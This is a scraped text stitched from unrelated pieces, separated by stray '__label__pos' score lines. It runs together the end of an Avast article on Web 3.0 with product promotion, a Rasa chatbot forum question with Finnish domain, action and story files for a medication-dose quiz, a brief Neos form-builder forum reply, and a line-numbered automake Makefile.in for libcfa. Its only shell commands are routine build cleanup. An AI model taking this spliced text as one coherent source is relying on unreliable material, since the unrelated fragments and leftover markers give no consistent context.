Web 3.0 exists in a technical manner, like blockchain, and a user experience manner, like a Web 3.0 app that can decipher your intent. Here are some examples of Web 3.0 that already exist:
• Blockchain technology: a decentralized record of transactions that are stored on a huge number of computers across the internet. All transactions can be publicly viewed, rely on sophisticated encryption, and are permanent.
• Cryptocurrency: a decentralized currency that isn't controlled by any government or central bank, using blockchain technology to record transactions. There are thousands of cryptocurrencies that currently exist, with Bitcoin being the most well-known.
• NFT: a non-fungible token linked to a unique digital or physical asset that can't be replaced with something else. NFTs are not cryptocurrencies, which consist of fungible or tradable tokens. This creative example of Web3 technology is bound to evolve in the future.
• Distributed computing or edge computing: this technology aims to deliver online data and services as close to where it's being requested or generated as possible. Edge computing leverages the processing power of many devices linked together, working as a kind of decentralized supercomputer. Decentralized computing is closely linked to the Internet of Things.
Get ironclad security for today and for the future
Regardless of whether you’re connected to Web 2.0 apps or already immersed in AI-powered Web 3.0 experiences, you need reliable cybersecurity to protect your personal data. Avast One is built on top of an award-winning anti-malware engine and includes built-in features like a high-speed VPN, optimization tools, and data breach monitoring. Secure your digital life today with Avast One.
FAQs
What’s the difference between Web 3.0 and Web3?
The terms Web 3.0 and Web3 are often used interchangeably. But Web 3.0 focuses on the Semantic Web, while Web3 refers to the idea of decentralization. Both concepts aim to give control back to users and offer an alternative vision of the web from the current one.
How does Web 3.0 benefit our lives?
As the third iteration of the web, Web 3.0 offers a range of benefits: It aims to make user experiences more seamless and tailored, on-screen visuals more appealing and advanced (3D graphics), and Web 3.0 technologies more secure.
What language will Web3 use?
Web3 will use numerous programming languages. Solidity is the most widely used language for blockchain programming, which is fundamental to Web3. Other important languages include C++, Java, Python, Rust, HTML, Vyper, Go (Golang), and C#.
Get truly comprehensive online security with Avast One
FREE INSTALL
Get an advanced firewall for your Wi-Fi with Avast One
FREE INSTALL
Other Threats
Security
Carly Burdova
8-12-2022
|
__label__pos
| 0.792323 |
Rasa actions, how to get back to actual bot?
My bot can now check answer and reply if it is correct or not but after that the bot doesn’t continue to next story?
My environment
rasa 2.2.0
rasa-sdk 2.2.0
Docker version 20.10.8, build 3967b7d
Ubuntu 18.04.5 LTS
Domain
version: "2.0"
intents:
- aloita
- vastaus01
- vastaus02
- siirry_diaan_09
- siirry_diaan_10
forms:
kysymys01_form:
vastaus01:
- type: from_text
slots:
vastaus01:
type: text
influence_conversation: false
responses:
utter_ask_vastaus01:
- text: "- Potilaalle on määrätty tyroksiinia 50 mikrogrammaa. Thyroxin tablettien vahvuus on 0,1 mg. Kuinka monta tablettia annat potilaalle? \n- Montako tablettia otat purkista ja annat potilaalle? \n- Kirjoita vastauksesi alle"
utter_kysymys01_oikein:
- text: Hienoa, oikea vastaus! potilas saa oikean annoksen lääkettä.
utter_lopetus:
- text: potilas saa oikean annoksen lääkettä.
image: "https://i.imgur.com/nGF1K8f.jpg"
utter_kysymys01_vaarin:
- text: "- Vastauksesi on väärin, lasketaan yhdessä uudestaan."
utter_kysymys_02:
- text: "- Aloitetaan siitä, että muunnetaan ensin yksiköt samaan yksikköön. \n- Koska potilaalle on määrätty lääkeannos mikrogrammoissa, sinun täytyy muuttaa lääkepurkin vahvuutena oleva milligrammat samaan yksikköön eli mikrogrammoiksi (potilaalle oli määrätty 50 mcg) \n- Purkissa olevan yhden tabletin vahvuus on? mikrogrammaa, kirjoita yksikönmuunnos vastauksesi alle."
utter_kysymys02_oikein:
- text: Hienoa, nyt on oikeat yksiköt laskua varten.
buttons:
- title: " en tiedä"
payload: "/siirry_diaan_09"
- title: " tarkistetaan mikä olikaan potilaalle määrätty annos "
payload: "/siirry_diaan_10"
- title: " annetaan potilaalle 0,05 tablettia"
payload: "/siirry_diaan_09"
utter_dia_09:
- text: Käydäänpä läpi miten yksikönmuunnokset tehdään.
utter_dia_10:
- text: "Käydäänpä läpi miten yksikönmuunnokset tehdään."
utter_kysymys02_vaarin:
- text: Väärin
utter_kysymys_03:
- text: Mikä olikaan potilaalle määrätty annos mikrogrammoina ? Tarvitset tämän tiedon pystyäksesi jatkamaan laskua. kirjoita vastauksesi alle.
utter_kysymys_04:
- text: Eli jos purkissa oleva tabletti on 100 mikrogrammaa ja potilaalle on määrätty 50 mikrogrammaa. Eli kuinka monta tablettia annat?
utter_dia_12:
- text: Kokeillaanpa laskea verranto -laskutavalla. X = kuinka monta tablettia pitää antaa?
utter_kysymys_05:
- text: Lasketaan verranto -laskutavalla /n- Kerrotaan ristiin 100 x X ja 50 x 1 /n- 100x = 50 /n- X = 50/100 /n- X = 0,5 eli ___ tbl /n- kirjoita vastauksesi alle
utter_kysymys05_vaarin:
- text: Katso matikkapirkon video verranto -laskutapa
utter_kysymys04_vaarin:
- text: lisää oikea teksti
utter_dia_13:
- text: tähän kanssa lisää
actions:
- action_tarkista_kysymys_01
- action_tarkista_kysymys_02
- action_tarkista_kysymys_04
- action_tarkista_kysymys_05
session_config:
session_expiration_time: 60
carry_over_slots_to_new_session: true
Actions
from typing import Any, Text, Dict, List
from rasa_sdk.events import SlotSet
from rasa_sdk import Action, Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.types import DomainDict
class kysymyksienTarkistus1(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_01"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "puolikas":
dispatcher.utter_message(text = "vastaus oikein")
dispatcher.utter_message(template = "utter_kysymys01_oikein")
dispatcher.utter_message(template = "utter_lopetus")
return []
else:
dispatcher.utter_message(text = "vastaus väärin")
dispatcher.utter_message(template = "utter_kysymys01_vaarin")
return []
class kysymyksienTarkistus2(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_02"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys02_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys02_vaarin")
return []
class kysymyksienTarkistus4(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_04"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys01_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys04_vaarin")
return []
class kysymyksienTarkistus5(Action):
def name(self) -> Text:
return "action_tarkista_kysymys_05"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:
vastaus = tracker.latest_message["text"]
# tarkistetaan onko vastaus oikein
if vastaus == "100":
dispatcher.utter_message(template = "utter_kysymys01_oikein")
return []
else:
dispatcher.utter_message(template = "utter_kysymys05_vaarin")
return []
NLU
version: "2.0"
nlu:
- intent: aloita
examples: |
- aloitus
- aloita
- intent: vastaus01
examples: |
- puolikas
- puoli
- intent: vastaus02
examples: |
- 100
- sata
- intent: siirry_diaan_09
examples: |
- siirry_diaan_09
- intent: siirry_diaan_10
examples: |
- siirry_diaan_10
Stories
version: "2.0"
stories:
- story: aloitus ja kysymys 01
steps:
- intent: aloita
- action: kysymys01_form
# formi kysyy kysymyksen
- active_loop: kysymys01_form
- active_loop: null
# - slot_was_set:
# - requested_slot: null
- action: action_tarkista_kysymys_01
- action: action_restart
- story: lopetus 01
steps:
- action: utter_kysymys01_oikein
- action: utter_lopetus
- story: kysymys 2
steps:
- action: utter_kysymys01_vaarin
- action: utter_kysymys_02
- intent: vastaus02
- action: action_tarkista_kysymys_02
- action: utter_kysymys02_oikein
- story: Valinta a ja c 01
steps:
- intent: siirry_diaan_09
- action: utter_dia_09
- action: utter_kysymys_02
- intent: vastaus02
- action: action_tarkista_kysymys_02
- action: utter_kysymys02_oikein
- story: Dia 10 ja kysymys 04
steps:
- intent: siirry_diaan_10
- action: utter_dia_10
- action: utter_kysymys_04
- intent: vastaus01
- action: action_tarkista_kysymys_04
- story: Kysymys 03 ja 04
steps:
- action: utter_kysymys02_vaarin
- action: utter_kysymys_03
- action: utter_kysymys_04
- intent: vastaus01
- action: action_tarkista_kysymys_04
- story: Kysymys 04
steps:
- action: utter_kysymys_04
- intent: vastaus01
- action: utter_kysymys04_vaarin
- action: utter_dia_12
- action: utter_dia_13
- story: kysymys 05
steps:
- action: utter_kysymys04_vaarin
- action: utter_dia_12
- action: utter_dia_13
- action: utter_kysymys_05
- intent: vastaus01
- action: action_tarkista_kysymys_05
- story: Kysymys 5 uudestaan
steps:
- action: utter_kysymys05_vaarin
- action: utter_kysymys_05
- intent: vastaus01
- action: action_tarkista_kysymys_05
Rules
version: "2.0"
rules:
- rule: Activate form
steps:
- intent: aloita
- action: kysymys01_form
- active_loop: kysymys01_form
- rule: Submit form
condition:
- active_loop: kysymys01_form
steps:
- action: kysymys01_form
- active_loop: null
- slot_was_set:
- requested_slot: null
- action: action_tarkista_kysymys_01
- action: action_restart
|
__label__pos
| 0.999648 |
[SOLVED] Add custom CSS class to input in neos/form-builder
Hey guys!
Is there a way to add custom CSS classes like the classic bootstrap “form-control” to the inputs in neos/form-builder @bwaidelich
Thank you for your answer.
Pat
Hi Patric,
it should be all documented here: https://flow-form-framework.readthedocs.io/en/stable/adjusting-form-output.html
or is there anything in particular that you miss?
Thank you Bastian! I found everything necessary in Settings.yaml of Neos.Form.
1 Like
|
__label__pos
| 0.986368 |
source: libcfa/Makefile.in @ c59712e
aaron-thesisarm-ehcleanup-dtorsdeferred_resndemanglerjacob/cs343-translationjenkins-sandboxnew-astnew-ast-unique-exprno_listpersistent-indexer
Last change on this file since c59712e was c59712e, checked in by Thierry Delisle <tdelisle@…>, 3 years ago
Parent make now seems to properly call libcfa
• Property mode set to 100644
File size: 23.7 KB
Line
1# Makefile.in generated by automake 1.15 from Makefile.am.
2# @configure_input@
3
4# Copyright (C) 1994-2014 Free Software Foundation, Inc.
5
6# This Makefile.in is free software; the Free Software Foundation
7# gives unlimited permission to copy and/or distribute it,
8# with or without modifications, as long as this notice is preserved.
9
10# This program is distributed in the hope that it will be useful,
11# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
12# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
13# PARTICULAR PURPOSE.
14
15@SET_MAKE@
16
17######################## -*- Mode: Makefile-Automake -*- ######################
18###############################################################################
19VPATH = @srcdir@
20am__is_gnu_make = { \
21 if test -z '$(MAKELEVEL)'; then \
22 false; \
23 elif test -n '$(MAKE_HOST)'; then \
24 true; \
25 elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \
26 true; \
27 else \
28 false; \
29 fi; \
30}
31am__make_running_with_option = \
32 case $${target_option-} in \
33 ?) ;; \
34 *) echo "am__make_running_with_option: internal error: invalid" \
35 "target option '$${target_option-}' specified" >&2; \
36 exit 1;; \
37 esac; \
38 has_opt=no; \
39 sane_makeflags=$$MAKEFLAGS; \
40 if $(am__is_gnu_make); then \
41 sane_makeflags=$$MFLAGS; \
42 else \
43 case $$MAKEFLAGS in \
44 *\\[\ \ ]*) \
45 bs=\\; \
46 sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \
47 | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \
48 esac; \
49 fi; \
50 skip_next=no; \
51 strip_trailopt () \
52 { \
53 flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \
54 }; \
55 for flg in $$sane_makeflags; do \
56 test $$skip_next = yes && { skip_next=no; continue; }; \
57 case $$flg in \
58 *=*|--*) continue;; \
59 -*I) strip_trailopt 'I'; skip_next=yes;; \
60 -*I?*) strip_trailopt 'I';; \
61 -*O) strip_trailopt 'O'; skip_next=yes;; \
62 -*O?*) strip_trailopt 'O';; \
63 -*l) strip_trailopt 'l'; skip_next=yes;; \
64 -*l?*) strip_trailopt 'l';; \
65 -[dEDm]) skip_next=yes;; \
66 -[JT]) skip_next=yes;; \
67 esac; \
68 case $$flg in \
69 *$$target_option*) has_opt=yes; break;; \
70 esac; \
71 done; \
72 test $$has_opt = yes
73am__make_dryrun = (target_option=n; $(am__make_running_with_option))
74am__make_keepgoing = (target_option=k; $(am__make_running_with_option))
75pkgdatadir = $(datadir)/@PACKAGE@
76pkgincludedir = $(includedir)/@PACKAGE@
77pkglibdir = $(libdir)/@PACKAGE@
78pkglibexecdir = $(libexecdir)/@PACKAGE@
79am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd
80install_sh_DATA = $(install_sh) -c -m 644
81install_sh_PROGRAM = $(install_sh) -c
82install_sh_SCRIPT = $(install_sh) -c
83INSTALL_HEADER = $(INSTALL_DATA)
84transform = $(program_transform_name)
85NORMAL_INSTALL = :
86PRE_INSTALL = :
87POST_INSTALL = :
88NORMAL_UNINSTALL = :
89PRE_UNINSTALL = :
90POST_UNINSTALL = :
91subdir = .
92ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
93am__aclocal_m4_deps = $(top_srcdir)/configure.ac
94am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \
95 $(ACLOCAL_M4)
96DIST_COMMON = $(srcdir)/Makefile.am $(top_srcdir)/configure \
97 $(am__configure_deps) $(am__DIST_COMMON)
98am__CONFIG_DISTCLEAN_FILES = config.status config.cache config.log \
99 configure.lineno config.status.lineno
100mkinstalldirs = $(install_sh) -d
101CONFIG_CLEAN_FILES =
102CONFIG_CLEAN_VPATH_FILES =
103AM_V_P = $(am__v_P_@AM_V@)
104am__v_P_ = $(am__v_P_@AM_DEFAULT_V@)
105am__v_P_0 = false
106am__v_P_1 = :
107AM_V_GEN = $(am__v_GEN_@AM_V@)
108am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@)
109am__v_GEN_0 = @echo " GEN " $@;
110am__v_GEN_1 =
111AM_V_at = $(am__v_at_@AM_V@)
112am__v_at_ = $(am__v_at_@AM_DEFAULT_V@)
113am__v_at_0 = @
114am__v_at_1 =
115SOURCES =
116DIST_SOURCES =
117RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \
118 ctags-recursive dvi-recursive html-recursive info-recursive \
119 install-data-recursive install-dvi-recursive \
120 install-exec-recursive install-html-recursive \
121 install-info-recursive install-pdf-recursive \
122 install-ps-recursive install-recursive installcheck-recursive \
123 installdirs-recursive pdf-recursive ps-recursive \
124 tags-recursive uninstall-recursive
125am__can_run_installinfo = \
126 case $$AM_UPDATE_INFO_DIR in \
127 n|no|NO) false;; \
128 *) (install-info --version) >/dev/null 2>&1;; \
129 esac
130RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \
131 distclean-recursive maintainer-clean-recursive
132am__recursive_targets = \
133 $(RECURSIVE_TARGETS) \
134 $(RECURSIVE_CLEAN_TARGETS) \
135 $(am__extra_recursive_targets)
136AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \
137 cscope distdir dist dist-all distcheck
138am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP)
139# Read a list of newline-separated strings from the standard input,
140# and print each of them once, without duplicates. Input order is
141# *not* preserved.
142am__uniquify_input = $(AWK) '\
143 BEGIN { nonempty = 0; } \
144 { items[$$0] = 1; nonempty = 1; } \
145 END { if (nonempty) { for (i in items) print i; }; } \
146'
147# Make sure the list of sources is unique. This is necessary because,
148# e.g., the same source file might be shared among _SOURCES variables
149# for different programs/libraries.
150am__define_uniq_tagged_files = \
151 list='$(am__tagged_files)'; \
152 unique=`for i in $$list; do \
153 if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
154 done | $(am__uniquify_input)`
155ETAGS = etags
156CTAGS = ctags
157CSCOPE = cscope
158DIST_SUBDIRS = $(SUBDIRS)
159am__DIST_COMMON = $(srcdir)/Makefile.in \
160 $(top_srcdir)/./automake/compile \
161 $(top_srcdir)/./automake/install-sh \
162 $(top_srcdir)/./automake/missing ./automake/compile \
163 ./automake/depcomp ./automake/install-sh ./automake/missing
164DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)
165distdir = $(PACKAGE)-$(VERSION)
166top_distdir = $(distdir)
167am__remove_distdir = \
168 if test -d "$(distdir)"; then \
169 find "$(distdir)" -type d ! -perm -200 -exec chmod u+w {} ';' \
170 && rm -rf "$(distdir)" \
171 || { sleep 5 && rm -rf "$(distdir)"; }; \
172 else :; fi
173am__post_remove_distdir = $(am__remove_distdir)
174am__relativize = \
175 dir0=`pwd`; \
176 sed_first='s,^\([^/]*\)/.*$$,\1,'; \
177 sed_rest='s,^[^/]*/*,,'; \
178 sed_last='s,^.*/\([^/]*\)$$,\1,'; \
179 sed_butlast='s,/*[^/]*$$,,'; \
180 while test -n "$$dir1"; do \
181 first=`echo "$$dir1" | sed -e "$$sed_first"`; \
182 if test "$$first" != "."; then \
183 if test "$$first" = ".."; then \
184 dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \
185 dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \
186 else \
187 first2=`echo "$$dir2" | sed -e "$$sed_first"`; \
188 if test "$$first2" = "$$first"; then \
189 dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \
190 else \
191 dir2="../$$dir2"; \
192 fi; \
193 dir0="$$dir0"/"$$first"; \
194 fi; \
195 fi; \
196 dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \
197 done; \
198 reldir="$$dir2"
199DIST_ARCHIVES = $(distdir).tar.gz
200GZIP_ENV = --best
201DIST_TARGETS = dist-gzip
202distuninstallcheck_listfiles = find . -type f -print
203am__distuninstallcheck_listfiles = $(distuninstallcheck_listfiles) \
204 | sed 's|^\./|$(prefix)/|' | grep -v '$(infodir)/dir$$'
205distcleancheck_listfiles = find . -type f -print
206ACLOCAL = @ACLOCAL@
207AMTAR = @AMTAR@
208AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@
209AUTOCONF = @AUTOCONF@
210AUTOHEADER = @AUTOHEADER@
211AUTOMAKE = @AUTOMAKE@
212AWK = @AWK@
213CC = @CC@
214CCAS = @CCAS@
215CCASDEPMODE = @CCASDEPMODE@
216CCASFLAGS = @CCASFLAGS@
217CCDEPMODE = @CCDEPMODE@
218CFLAGS = @CFLAGS@
219CPPFLAGS = @CPPFLAGS@
220CXX = @CXX@
221CXXDEPMODE = @CXXDEPMODE@
222CXXFLAGS = @CXXFLAGS@
223CYGPATH_W = @CYGPATH_W@
224DEFS = @DEFS@
225DEPDIR = @DEPDIR@
226ECHO_C = @ECHO_C@
227ECHO_N = @ECHO_N@
228ECHO_T = @ECHO_T@
229EXEEXT = @EXEEXT@
230INSTALL = @INSTALL@
231INSTALL_DATA = @INSTALL_DATA@
232INSTALL_PROGRAM = @INSTALL_PROGRAM@
233INSTALL_SCRIPT = @INSTALL_SCRIPT@
234INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@
235LDFLAGS = @LDFLAGS@
236LIBOBJS = @LIBOBJS@
237LIBS = @LIBS@
238LTLIBOBJS = @LTLIBOBJS@
239MAKEINFO = @MAKEINFO@
240MKDIR_P = @MKDIR_P@
241OBJEXT = @OBJEXT@
242PACKAGE = @PACKAGE@
243PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@
244PACKAGE_NAME = @PACKAGE_NAME@
245PACKAGE_STRING = @PACKAGE_STRING@
246PACKAGE_TARNAME = @PACKAGE_TARNAME@
247PACKAGE_URL = @PACKAGE_URL@
248PACKAGE_VERSION = @PACKAGE_VERSION@
249PATH_SEPARATOR = @PATH_SEPARATOR@
250RANLIB = @RANLIB@
251SET_MAKE = @SET_MAKE@
252SHELL = @SHELL@
253STRIP = @STRIP@
254VERSION = @VERSION@
255abs_builddir = @abs_builddir@
256abs_srcdir = @abs_srcdir@
257abs_top_builddir = @abs_top_builddir@
258abs_top_srcdir = @abs_top_srcdir@
259ac_ct_CC = @ac_ct_CC@
260ac_ct_CXX = @ac_ct_CXX@
261am__include = @am__include@
262am__leading_dot = @am__leading_dot@
263am__quote = @am__quote@
264am__tar = @am__tar@
265am__untar = @am__untar@
266bindir = @bindir@
267build_alias = @build_alias@
268builddir = @builddir@
269datadir = @datadir@
270datarootdir = @datarootdir@
271docdir = @docdir@
272dvidir = @dvidir@
273exec_prefix = @exec_prefix@
274host_alias = @host_alias@
275htmldir = @htmldir@
276includedir = @includedir@
277infodir = @infodir@
278install_sh = @install_sh@
279libdir = @libdir@
280libexecdir = @libexecdir@
281localedir = @localedir@
282localstatedir = @localstatedir@
283mandir = @mandir@
284mkdir_p = @mkdir_p@
285oldincludedir = @oldincludedir@
286pdfdir = @pdfdir@
287prefix = @prefix@
288program_transform_name = @program_transform_name@
289psdir = @psdir@
290runstatedir = @runstatedir@
291sbindir = @sbindir@
292sharedstatedir = @sharedstatedir@
293srcdir = @srcdir@
294sysconfdir = @sysconfdir@
295target_alias = @target_alias@
296top_build_prefix = @top_build_prefix@
297top_builddir = @top_builddir@
298top_srcdir = @top_srcdir@
299AUTOMAKE_OPTIONS = foreign # do not require all the GNU file names
300SUBDIRS = prelude src # order important
301all: all-recursive
302
303.SUFFIXES:
304am--refresh: Makefile
305 @:
306$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)
307 @for dep in $?; do \
308 case '$(am__configure_deps)' in \
309 *$$dep*) \
310 echo ' cd $(srcdir) && $(AUTOMAKE) --foreign'; \
311 $(am__cd) $(srcdir) && $(AUTOMAKE) --foreign \
312 && exit 0; \
313 exit 1;; \
314 esac; \
315 done; \
316 echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign Makefile'; \
317 $(am__cd) $(top_srcdir) && \
318 $(AUTOMAKE) --foreign Makefile
319Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status
320 @case '$?' in \
321 *config.status*) \
322 echo ' $(SHELL) ./config.status'; \
323 $(SHELL) ./config.status;; \
324 *) \
325 echo ' cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__depfiles_maybe)'; \
326 cd $(top_builddir) && $(SHELL) ./config.status $@ $(am__depfiles_maybe);; \
327 esac;
328
329$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
330 $(SHELL) ./config.status --recheck
331
332$(top_srcdir)/configure: $(am__configure_deps)
333 $(am__cd) $(srcdir) && $(AUTOCONF)
334$(ACLOCAL_M4): $(am__aclocal_m4_deps)
335 $(am__cd) $(srcdir) && $(ACLOCAL) $(ACLOCAL_AMFLAGS)
336$(am__aclocal_m4_deps):
337
338# This directory's subdirectories are mostly independent; you can cd
339# into them and run 'make' without going through this Makefile.
340# To change the values of 'make' variables: instead of editing Makefiles,
341# (1) if the variable is set in 'config.status', edit 'config.status'
342# (which will cause the Makefiles to be regenerated when you run 'make');
343# (2) otherwise, pass the desired values on the 'make' command line.
344$(am__recursive_targets):
345 @fail=; \
346 if $(am__make_keepgoing); then \
347 failcom='fail=yes'; \
348 else \
349 failcom='exit 1'; \
350 fi; \
351 dot_seen=no; \
352 target=`echo $@ | sed s/-recursive//`; \
353 case "$@" in \
354 distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \
355 *) list='$(SUBDIRS)' ;; \
356 esac; \
357 for subdir in $$list; do \
358 echo "Making $$target in $$subdir"; \
359 if test "$$subdir" = "."; then \
360 dot_seen=yes; \
361 local_target="$$target-am"; \
362 else \
363 local_target="$$target"; \
364 fi; \
365 ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
366 || eval $$failcom; \
367 done; \
368 if test "$$dot_seen" = "no"; then \
369 $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \
370 fi; test -z "$$fail"
371
372ID: $(am__tagged_files)
373 $(am__define_uniq_tagged_files); mkid -fID $$unique
374tags: tags-recursive
375TAGS: tags
376
377tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files)
378 set x; \
379 here=`pwd`; \
380 if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \
381 include_option=--etags-include; \
382 empty_fix=.; \
383 else \
384 include_option=--include; \
385 empty_fix=; \
386 fi; \
387 list='$(SUBDIRS)'; for subdir in $$list; do \
388 if test "$$subdir" = .; then :; else \
389 test ! -f $$subdir/TAGS || \
390 set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \
391 fi; \
392 done; \
393 $(am__define_uniq_tagged_files); \
394 shift; \
395 if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \
396 test -n "$$unique" || unique=$$empty_fix; \
397 if test $$# -gt 0; then \
398 $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
399 "$$@" $$unique; \
400 else \
401 $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
402 $$unique; \
403 fi; \
404 fi
405ctags: ctags-recursive
406
407CTAGS: ctags
408ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files)
409 $(am__define_uniq_tagged_files); \
410 test -z "$(CTAGS_ARGS)$$unique" \
411 || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \
412 $$unique
413
414GTAGS:
415 here=`$(am__cd) $(top_builddir) && pwd` \
416 && $(am__cd) $(top_srcdir) \
417 && gtags -i $(GTAGS_ARGS) "$$here"
418cscope: cscope.files
419 test ! -s cscope.files \
420 || $(CSCOPE) -b -q $(AM_CSCOPEFLAGS) $(CSCOPEFLAGS) -i cscope.files $(CSCOPE_ARGS)
421clean-cscope:
422 -rm -f cscope.files
423cscope.files: clean-cscope cscopelist
424cscopelist: cscopelist-recursive
425
426cscopelist-am: $(am__tagged_files)
427 list='$(am__tagged_files)'; \
428 case "$(srcdir)" in \
429 [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \
430 *) sdir=$(subdir)/$(srcdir) ;; \
431 esac; \
432 for i in $$list; do \
433 if test -f "$$i"; then \
434 echo "$(subdir)/$$i"; \
435 else \
436 echo "$$sdir/$$i"; \
437 fi; \
438 done >> $(top_builddir)/cscope.files
439
440distclean-tags:
441 -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags
442 -rm -f cscope.out cscope.in.out cscope.po.out cscope.files
443
444distdir: $(DISTFILES)
445 $(am__remove_distdir)
446 test -d "$(distdir)" || mkdir "$(distdir)"
447 @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
448 topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
449 list='$(DISTFILES)'; \
450 dist_files=`for file in $$list; do echo $$file; done | \
451 sed -e "s|^$$srcdirstrip/||;t" \
452 -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \
453 case $$dist_files in \
454 */*) $(MKDIR_P) `echo "$$dist_files" | \
455 sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \
456 sort -u` ;; \
457 esac; \
458 for file in $$dist_files; do \
459 if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \
460 if test -d $$d/$$file; then \
461 dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
462 if test -d "$(distdir)/$$file"; then \
463 find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \
464 fi; \
465 if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
466 cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \
467 find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \
468 fi; \
469 cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \
470 else \
471 test -f "$(distdir)/$$file" \
472 || cp -p $$d/$$file "$(distdir)/$$file" \
473 || exit 1; \
474 fi; \
475 done
476 @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \
477 if test "$$subdir" = .; then :; else \
478 $(am__make_dryrun) \
479 || test -d "$(distdir)/$$subdir" \
480 || $(MKDIR_P) "$(distdir)/$$subdir" \
481 || exit 1; \
482 dir1=$$subdir; dir2="$(distdir)/$$subdir"; \
483 $(am__relativize); \
484 new_distdir=$$reldir; \
485 dir1=$$subdir; dir2="$(top_distdir)"; \
486 $(am__relativize); \
487 new_top_distdir=$$reldir; \
488 echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \
489 echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \
490 ($(am__cd) $$subdir && \
491 $(MAKE) $(AM_MAKEFLAGS) \
492 top_distdir="$$new_top_distdir" \
493 distdir="$$new_distdir" \
494 am__remove_distdir=: \
495 am__skip_length_check=: \
496 am__skip_mode_fix=: \
497 distdir) \
498 || exit 1; \
499 fi; \
500 done
501 -test -n "$(am__skip_mode_fix)" \
502 || find "$(distdir)" -type d ! -perm -755 \
503 -exec chmod u+rwx,go+rx {} \; -o \
504 ! -type d ! -perm -444 -links 1 -exec chmod a+r {} \; -o \
505 ! -type d ! -perm -400 -exec chmod a+r {} \; -o \
506 ! -type d ! -perm -444 -exec $(install_sh) -c -m a+r {} {} \; \
507 || chmod -R a+r "$(distdir)"
508dist-gzip: distdir
509 tardir=$(distdir) && $(am__tar) | GZIP=$(GZIP_ENV) gzip -c >$(distdir).tar.gz
510 $(am__post_remove_distdir)
511
512dist-bzip2: distdir
